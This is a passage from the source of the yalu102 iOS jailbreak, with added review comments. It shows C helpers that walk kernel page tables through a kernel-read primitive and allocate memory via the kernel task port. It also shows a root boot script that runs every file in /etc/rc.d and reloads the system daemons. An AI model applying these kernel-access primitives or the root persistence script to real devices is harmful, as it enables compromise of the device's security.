            case 2:
                tteaddr = table + TTE_INDEX(target_addr, level2);
                break;

            case 3:
                tteaddr = table + TTE_INDEX(target_addr, level3);
                break;

            default:
                break;
        }


    }

    //parse_block_tte(level1_entry);

    pagestuff_64_callback(tteaddr, level);

    // Despite the name, this holds the entry for whichever level is current.
    uint64_t level1_entry = ReadAnywhere64(tteaddr);

    if (TTE_GET(level1_entry, TTE_IS_TABLE_MASK) && level != 3) {
        pagestuff_64(vmaddr, pagestuff_64_callback, (TTE_GET(level1_entry, TTE_PHYS_VALUE_MASK)) - gPhysBase + gVirtBase, level + 1);
    }
}

/*
 * Return the physical page address that the level-3 entry for virtaddr points
 * to, or 0 if the walk never reaches level 3.
 *
 * The walk starts at level1_table, treated as level 1 when isvad is set
 * (4 KiB pages) and as level 2 otherwise. The result is the entry masked with
 * TTE_PHYS_VALUE_MASK; the offset within the page is not added.
 *
 * NOTE(review): isvad is read in the argument list before pagestuff_64() calls
 * checkvad(), so on a first call it may still hold its initial 0 — verify
 * that a caller runs checkvad() beforehand.
 * NOTE(review): a mapping that ends in a block entry above level 3 yields 0,
 * which is indistinguishable from physical address 0.
 */
uint64_t findphys_real(uint64_t virtaddr) {
    __block uint64_t physvar = 0;
    pagestuff_64(virtaddr, ^(vm_address_t tte_addr, int addr) {
        uint64_t tte = ReadAnywhere64(tte_addr);
        // The trailing backslash is a stray line continuation; it has no effect.
        if (addr == 3) {\
            physvar = TTE_GET(tte, TTE_PHYS_VALUE_MASK);
        }
    }, level1_table, isvad ? 1 : 2);

    return physvar;

}
/*
 * Allocate `size` bytes in the task referred to by tfp0 (declared elsewhere)
 * with mach_vm_allocate(VM_FLAGS_ANYWHERE) and return the address.
 *
 * NOTE(review): the kern_return_t is discarded; on failure the function
 * returns whatever is left in ret, which is 0 if the call did not write it.
 * NOTE(review): despite the name, the call shown allocates virtual memory.
 */
uint64_t physalloc(uint64_t size) {
    uint64_t ret = 0;
    mach_vm_allocate(tfp0, (mach_vm_address_t*) &ret, size, VM_FLAGS_ANYWHERE);
    return ret;
}

#endif
--------------------------------------------------------------------------------
/yalu102/reload:
--------------------------------------------------------------------------------
#!/bin/sh
# Executes every entry in /etc/rc.d, then unloads and reloads the launch
# daemons. jailbreak.m installs this script as /usr/libexec/reload (owner 0:0,
# mode 0755) next to /Library/LaunchDaemons/0.reload.plist, so it presumably
# runs as root at load time; confirm against the plist.
# NOTE(review): $a is unquoted and the list comes from parsing ls, so names
# containing whitespace or glob characters are split or expanded. Whatever is
# present in /etc/rc.d is executed on every run, which makes that directory
# worth auditing on a device where this script is found.
ls /etc/rc.d | while read a; do /etc/rc.d/$a; done
sleep 1
# Unloads every system daemon plist except names containing logd, fud or ReportCrash.
launchctl unload $(ls /System/Library/LaunchDaemons/ | grep -v logd | grep -v fud | grep -v ReportCrash | while read a; do printf /System/Library/LaunchDaemons/$a\ ; done)
launchctl unload /System/Library/NanoLaunchDaemons
sleep 1
launchctl load /Library/LaunchDaemons
launchctl load /System/Library/LaunchDaemons
launchctl load /System/Library/NanoLaunchDaemons

exit 0
--------------------------------------------------------------------------------
/yalu102/tar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/tar
--------------------------------------------------------------------------------